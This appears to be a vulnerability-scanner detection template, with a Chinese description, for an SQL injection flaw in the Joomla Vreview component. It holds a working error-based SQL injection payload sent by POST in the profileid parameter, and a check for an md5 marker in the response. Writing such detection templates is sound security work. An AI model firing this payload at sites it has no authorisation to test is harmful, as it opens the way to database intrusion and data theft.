漏洞描述
Joomla Component Vreview 存在SQL注入漏洞
id: joomla-component-vreview-sql
info:
name: Joomla Component Vreview sql
author: 南方有梦
severity: high
verified: true
description: |-
Joomla Component Vreview 存在SQL注入漏洞
tags: joomla,component,vrreview,sql
created: 2024/02/29
set:
r1: randomInt(800000000, 1000000000)
rules:
r0:
request:
method: POST
path: /index.php?option=com_vreview&task=displayReply
headers:
Content-Type: application/x-www-form-urlencoded
body: profileid=-8511 OR 1 GROUP BY CONCAT(0x7e,md5({{r1}}),0x7e,FLOOR(RAND(0)*2)) HAVING MIN(0)#
follow_redirects: true
expression: response.body.bcontains(bytes(substr(md5(string(r1)), 0, 31)))
expression: r0()